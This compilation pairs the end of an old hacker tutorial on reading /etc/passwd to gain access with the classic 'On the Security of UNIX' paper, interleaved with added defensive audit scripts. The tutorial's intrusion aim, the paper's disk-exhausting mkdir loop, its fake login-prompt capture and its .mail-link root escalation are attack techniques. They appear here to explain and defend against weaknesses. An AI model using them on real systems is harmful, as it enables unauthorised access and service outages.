Things to do when you are in: Some of the commands that you may want to
try follow below:
who is on (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)
To exit chat mode try ctrl-D.
EOT=End of Transfer.
ls -a (list all files in current directory.)
du -a (checks the amount of disk space your files use; disk usage)
cd name (name is the name of the sub-directory you choose)
cd (with no argument, brings your home directory to current use)
cat name (name is a filename, either a program or documentation your username has written)
Most Unix programs are written in the C language or Pascal
since Unix is a programmers' environment. One of the first things done on the
system is print up or capture (in a buffer) the file containing all user names
and accounts. This can be done by doing the following command:
cat /etc/passwd
If you are successful you will see a list of all accounts on the system. It
should look like this:
root:hvnsdcf:0:0:root dir:/:
joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe
hal::1:2:Hal Smith:/bin:/bin/hal
The "root" line tells the following info :
login name=root
hvnsdcf = encrypted password
0 = user group number
0 = user number
root dir = name of user
/ = root directory
In the Joe login, the last part "/bin/joe" tells us which directory
is his home directory (joe). In the "hal" example the login name is
followed by 2 colons; that means that there is no password needed to get in
using his name.
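The check an administrator would run over that same file, added here as an example that is not part of the original tutorial: an awk program wrapped in a shell function that flags every entry whose password field is empty (the "hal" case above, where no password is needed) and every UID-0 entry other than root. It follows the standard passwd(5) field order, name:password:UID:GID:comment:home:shell. The demo uses the three lines quoted above plus one constructed UID-0 entry so that the second check also fires.

```sh
#!/bin/sh
# Added example: audit a passwd-format file for the two things an
# attacker reading it looks for first.
# Fields (passwd(5)): name:password:UID:GID:comment:home:shell

audit_passwd() {
    awk -F: '
        /^[[:space:]]*$/ || /^#/ { next }        # skip blank lines and comments
        NF != 7 { printf "MALFORMED line %d: %d fields\n", NR, NF; next }
        $2 == ""                { printf "NO-PASSWORD: %s\n", $1 }
        $3 == 0 && $1 != "root" { printf "EXTRA-UID0: %s\n", $1 }
    ' "$1"
}

# Demo on constructed input: the three lines quoted in the text plus
# one extra UID-0 account (not from any real system).
demo_audit_passwd() {
    sample=$(mktemp)
    cat > "$sample" <<'EOF'
root:hvnsdcf:0:0:root dir:/:
joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe
hal::1:2:Hal Smith:/bin:/bin/hal
spare:x:0:0:second UID-0 login (constructed):/:/bin/sh
EOF
    audit_passwd "$sample"
    rm -f "$sample"
}
```

On a real system run audit_passwd /etc/passwd (and, where passwords live in a shadow file, the same empty-field check against that file), and treat any NO-PASSWORD or EXTRA-UID0 line as something to fix the same day.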
Conclusion: I hope that this file will help other novice Unix hackers
obtain access to the Unix/Xenix systems that they may find.
On the Security of UNIX
=-=-=-=-=-=-=-=-=-=-=-=
Recently there has been much interest in the security aspects of operating
systems and software. At issue is the ability to prevent undesired disclosure of
information, destruction of information, and harm to the functioning of the
system. This paper discusses the degree of security which can be provided under
the system and offers a number of hints on how to improve security. The first
fact to face is that UNIX was not developed with security, in any realistic
sense, in mind; this fact alone guarantees a vast number of holes. (Actually the
same statement can be made with respect to most systems.)
The area of security in which UNIX is theoretically weakest is in protecting
against crashing or at least crippling the operation of the system. The problem
here is not mainly in uncritical acceptance of bad parameters to system calls
(there may be bugs in this area, but none are known) but rather in lack of
checks for excessive consumption of resources.
Most notably, there is no limit on the amount of disk storage used, either in
total space allocated or in the number of files or directories. Here is a
particularly ghastly shell sequence guaranteed to stop the system:
while : ; do
mkdir x
cd x
done
Either a panic will occur because all the i-nodes on the device are used up,
or all the disk blocks will be consumed, thus preventing anyone from writing
files on the device. In this version of the system, users are prevented from
creating more than a set number of processes simultaneously, so unless users
are in collusion it is unlikely that any one can stop the system altogether.
However, creation of 20 or so CPU- or disk-bound jobs leaves few resources
available for others. Also, if many large jobs are run simultaneously, swap
space may run out, causing a panic. It should be evident that excessive
consumption of disk space, files, swap space and processes can easily occur
accidentally in malfunctioning programs as well as at command level. In fact
UNIX is essentially defenseless against this kind of abuse, nor is there any
easy fix. The best that can be said is that it is generally fairly easy to
detect what has happened when disaster strikes, to identify the user
responsible, and take appropriate action. In practice, we have found that
difficulties in this area are rather rare, but we have not been faced with
malicious users, and enjoy a fairly generous supply of resources which have
served to cushion us against accidental overconsumption.
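Two checks that catch this kind of exhaustion before the panic, added as an example that is not part of the paper: the first reads "df -iP" output and flags filesystems whose i-node use is above a threshold, the second finds directory chains nested deeper than a given level, which is the footprint the mkdir loop above leaves. The df lines in the demo are constructed, not taken from a real machine.

```sh
#!/bin/sh
# Added example: detect i-node exhaustion and runaway directory nesting.

# Read "df -iP" output on stdin; print "<mountpoint> <use%>" for every
# filesystem whose i-node use exceeds LIMIT percent (default 90).
# Usage: df -iP | flag_inode_exhaustion 90
flag_inode_exhaustion() {
    limit=${1:-90}
    awk -v limit="$limit" '
        NR > 1 {                        # skip the header line
            use = $5; sub(/%/, "", use) # column 5 is IUse%, column 6 the mount point
            if (use + 0 > limit) print $6, use "%"
        }'
}

# Print the first directory on each branch that lies DEPTH or more levels
# below DIR; -prune stops find from descending into the rest of the chain.
find_deep_nesting() {
    dir=$1; depth=$2
    find "$dir" -mindepth "$depth" -type d -prune -print
}

# Constructed "df -iP" output for the demo (not from a real system).
demo_flag_inode_exhaustion() {
    printf '%s\n' \
        'Filesystem     Inodes  IUsed  IFree IUse% Mounted on' \
        '/dev/sda1     1310720 131072 1179648   10% /' \
        '/dev/sdb1      655360 648806   6554   99% /home' \
        'tmpfs          256000   1200 254800    1% /tmp' |
    flag_inode_exhaustion 90
}
```

The per-user process limit the paper mentions is today's "ulimit -u", and the missing disk limit is what filesystem quotas supply; the two functions above are the monitoring side, run from cron so that a full device is noticed while the responsible directory tree can still be identified and removed.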
The picture is considerably brighter in the area of protection of information
from unauthorized perusal and destruction. Here the degree of security seems
(almost) adequate theoretically, and the problems lie more in the necessity for
care in the actual use of the system. Each UNIX file has associated with it
eleven bits of protection information together with a user identification
number and a user-group identification number (UID and GID).
Nine of the protection bits are used to specify independently permission to
read, to write, and to execute the file to the user himself, to members of the
user's group, and to all other users. Each process generated by or for a user
has associated with it an effective UID and a real UID, and an effective and
real GID. The remaining two bits are the set-UID and set-GID bits. When a file
with the set-UID bit set is executed, the effective UID for the process is
changed to the UID associated with the file; the change persists until the
process terminates or until the effective UID is changed again by another
execution of a set-UID file. Similarly the effective group ID of a process is
changed to the GID associated with a file when that file is executed and has
the set-GID bit set. The real UID and GID of a process do not change when any
file is executed, but only as the result of a privileged system call. The basic
notion of the set-UID and set-GID bits is that one may write a program which is
executable by others and which maintains files accessible to others only by
that program.
The classical example is the game-playing program which maintains records of
the scores of its players. The program itself has to read and write the score
file, but no one but the game's sponsor can be allowed unrestricted access to
the file lest they manipulate the game to their own advantage.
The solution is to turn on the set-UID bit of the game program. When, and only
when, it is invoked by players of the game, it may update the score file, but
ordinary programs executed by others cannot access the score. There are a
number of special cases involved in determining access permissions. Since
executing a directory as a program is a meaningless operation, the
execute-permission bit, for directories, is taken instead to mean permission to
search the directory for a given file during the scanning of a path name; thus
if a directory has execute permission but no read permission for a given user,
he may access files with known names in the directory, but may not read (list)
the entire contents of the directory.
Write permission on a directory is interpreted to mean that the user may create
and delete files in that directory; it is impossible for any user to write
directly into any directory. Another, and from the point of view of security,
much more serious special case is that there is a ``super user'' who is able to
read any file and write any non-directory. The super-user is also able to change
the protection mode and the owner UID and GID of any file and to invoke
privileged system calls. It must be recognized that the mere notion of a
super-user is a theoretical, and usually practical, blemish on any protection
scheme.
The first necessity for a secure system is of course arranging that all files
and directories have the proper protection modes. Traditionally, UNIX software
has been exceedingly permissive in this regard; essentially all commands create
files readable and writable by everyone. In the current version, this policy may
be easily adjusted to suit the needs of the installation or the individual user.
Associated with each process and its descendants is a mask, which is in effect
anded with the mode of every file and directory created by that process. In
this way, users can arrange that, by default, all their files are no more
accessible than they wish. The standard mask, set by login, allows all
permissions to the user himself and to his group, but disallows writing by
others.
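What that mask does in practice, shown with an added shell example that is not part of the paper: a new file is requested with mode 666 and a new directory with 777, and every bit set in the umask is cleared from the result. The function creates a scratch file and directory under the given mask and reports the modes actually obtained, so the mask described in the text (all permissions for user and group, no writing by others) can be seen as 002.

```sh
#!/bin/sh
# Added example: show what a given umask leaves on new files and directories.

# Octal mode of a path: GNU stat first, BSD stat as the fallback.
octal_mode() {
    stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1"
}

# Create a file and a directory under umask MASK in a scratch area and
# print "<file mode> <dir mode>", e.g. "644 755" for umask 022.
modes_under_umask() {
    mask=$1
    scratch=$(mktemp -d)
    (
        umask "$mask"          # only this subshell is affected
        : > "$scratch/f"       # created as 0666 with the mask bits cleared
        mkdir "$scratch/d"     # created as 0777 with the mask bits cleared
    )
    printf '%s %s\n' "$(octal_mode "$scratch/f")" "$(octal_mode "$scratch/d")"
    rm -rf "$scratch"
}

# modes_under_umask 002   -> 664 775   (the login mask described in the text)
# modes_under_umask 077   -> 600 700   (nothing for group or others)
```

A umask of 077 in the login profile is the simplest way for a user to get the "inaccessible to others" default the next paragraph asks for.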
To maintain both data privacy and data integrity, it is necessary, and largely
sufficient, to make one's files inaccessible to others. The lack of sufficiency
could follow from the existence of set-UID programs created by the user and the
possibility of total breach of system security in one of the ways discussed
below (or one of the ways not discussed below).
For greater protection, an encryption scheme is available. Since the editor is
able to create encrypted documents, and the crypt command can be used to pipe
such documents into the other text-processing programs, the length of time
during which clear text versions need be available is strictly limited. The
encryption scheme used is not one of the strongest known, but it is judged
adequate, in the sense that cryptanalysis is likely to require considerably more
effort than more direct methods of reading the encrypted files. For example, a
user who stores data that he regards as truly secret should be aware that he is
implicitly trusting the system administrator not to install a version of the
crypt command that stores every typed password in a file. Needless to say, the
system administrators must be at least as careful as their most demanding user
to place the correct protection mode on the files under their control.
In particular, it is necessary that special files be protected from writing, and
probably reading, by ordinary users when they store sensitive files belonging
to other users. It is easy to write programs that examine and change files by
accessing the device on which the files live.
On the issue of password security, UNIX is probably better than most systems.
Passwords are stored in an encrypted form which, in the absence of serious
attention from specialists in the field, appears reasonably secure, provided its
limitations are understood. In the current version, it is based on a slightly
defective version of the Federal DES; it is purposely defective so that
easily-available hardware is useless for attempts at exhaustive
key-search. Since both the encryption algorithm and the encrypted passwords are
available, exhaustive enumeration of potential passwords is still feasible up to
a point. We have observed that users choose passwords that are easy to
guess: they are short, or from a limited alphabet, or in a dictionary.
Passwords should be at least six characters long and randomly chosen from an
alphabet which includes digits and special characters.
Of course there also exist feasible non-cryptanalytic ways of finding out
passwords. For example: write a program which types out ``login:'' on the
typewriter and copies whatever is typed to a file of your own. Then invoke the
command and go away until the victim arrives.
The set-UID (set-GID) notion must be used carefully if any security is to be
maintained. The first thing to keep in mind is that a writable set-UID file can
have another program copied onto it.
For example, if the super-user command is writable, anyone can copy the shell
onto it and get a password-free version of Shell Unix. A more subtle problem can
come from set-UID programs which are not sufficiently careful of what is fed
into them. To take an obsolete example, the previous version of the mail command
was set-UID and owned by the super-user. This version sent mail to the
recipient's own directory. The notion was that one should be able to send mail
to anyone even if they want to protect their directories from writing. The
trouble was that mail was rather dumb: anyone could mail someone else's private
file to himself. Much more serious is the following scenario: make a file with a
line like one in the password file which allows one to log in as the super-user.
Then make a link named ``.mail'' to the password file in some writable directory
on the same device as the password file (say /tmp). Finally mail the bogus login
line to /tmp/.mail; you can then log in as the super-user, clean up the
incriminating evidence, and have your will.
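A check for the first of those two problems, a set-UID or set-GID file that someone other than its owner can write to, added as an example that is not part of the paper. It walks a directory tree with find; on a real system it is pointed at / (or at each local filesystem, since -xdev keeps it from crossing mount points). The second problem, a set-UID program that is careless about its input, has no mechanical test, so the companion function simply lists every set-UID file for a human to review.

```sh
#!/bin/sh
# Added example: find set-UID/set-GID files that group or others may write.

# Print "<mode> <owner> <path>" for every set-UID or set-GID regular file
# under DIR whose group-write or other-write bit is also set.
writable_setid_files() {
    dir=$1
    find "$dir" -xdev -type f \
         \( -perm -4000 -o -perm -2000 \) \
         \( -perm -0020 -o -perm -0002 \) \
         -exec ls -l -- {} + 2>/dev/null |
    awk '{ print $1, $3, $NF }'
}

# For review: every set-UID file under DIR, writable or not.
all_setuid_files() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null
}

# Typical use on a real system (an assumption about the layout):
# writable_setid_files /        # should print nothing at all
# all_setuid_files /            # compare against last week's list
```

Anything writable_setid_files prints is the "copy the shell onto it" case from the text and should lose its write bits or its set-UID bit at once; the all_setuid_files list is worth keeping under version control so that a new entry stands out.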
The fact that users can mount their own disks and tapes as file systems can be
another way of gaining super-user status. Once a disk pack is mounted, the
system believes what is on it. Thus one can take a blank disk pack, put on it
anything desired, and mount it. There are obvious and unfortunate consequences.
For example: a mounted disk with garbage on it will crash the system; one of the
files on the mounted disk can easily be a password-free version of Shell Unix;
other files can be unprotected entries for special files. The only easy fix
for this problem is to forbid the use of mount to unprivileged users. A
partial solution, not so restrictive, would be to have the mount command examine
the special file for bad data, set-UID programs owned by others, and accessible
special files, and balk at unprivileged invokers.
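The modern form of that partial solution is to mount anything users can bring in with the nosuid and nodev options, which refuse exactly the two kinds of file the paper names: set-UID programs owned by others and accessible special files. Added example, not part of the paper: a function that reads /proc/mounts-format lines (device, mount point, type, options) and reports mounts under the given prefixes that lack either option. The mount lines in the demo are constructed.

```sh
#!/bin/sh
# Added example: check removable and user-accessible mounts for nosuid and nodev.

# Read /proc/mounts-format lines on stdin ("device mountpoint type options ...").
# For every mount point equal to or under one of the PREFIX arguments, print
# which of nosuid and nodev it is missing.
# Usage: check_mount_options /media /mnt < /proc/mounts
check_mount_options() {
    prefixes=$*
    awk -v prefixes="$prefixes" '
        BEGIN { n = split(prefixes, p, " ") }
        {
            mnt = $2; opts = "," $4 ","     # wrap in commas so tokens match whole
            under = 0
            for (i = 1; i <= n; i++)
                if (mnt == p[i] || index(mnt, p[i] "/") == 1) under = 1
            if (!under) next
            missing = ""
            if (opts !~ /,nosuid,/) missing = "nosuid"
            if (opts !~ /,nodev,/)  missing = (missing == "" ? "" : missing ",") "nodev"
            if (missing != "") printf "%s missing %s\n", mnt, missing
        }'
}

# Constructed mount table for the demo (not from a real system).
demo_check_mount_options() {
    printf '%s\n' \
        '/dev/sda1 / ext4 rw,relatime 0 0' \
        '/dev/sdb1 /media/usb vfat rw,nosuid,nodev,relatime 0 0' \
        '/dev/sdc1 /mnt/backup ext4 rw,relatime 0 0' \
        '/dev/sdd1 /mnt/scratch ext4 rw,nodev,relatime 0 0' |
    check_mount_options /media /mnt
}
```

The same two options belong in the fstab entry for any user-mountable device, and the paper's other request, refusing "bad data", is what a read-only mount or fsck before mounting gives you.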